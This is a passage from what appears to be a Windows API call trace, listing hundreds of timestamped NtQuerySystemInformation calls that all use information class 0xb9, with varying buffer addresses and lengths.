(SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fece0, Length=0x20, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x20, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x20, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x20, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fece0, Length=0x20, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec70, Length=0x20, ResultLength=0x0) [0223.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec70, Length=0x20, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee90, Length=0x40, ResultLength=0x0) [0223.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0223.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0223.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0223.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0223.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0223.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0223.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0223.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee90, Length=0x40, ResultLength=0x0) [0224.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee90, Length=0x40, ResultLength=0x0) [0224.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, 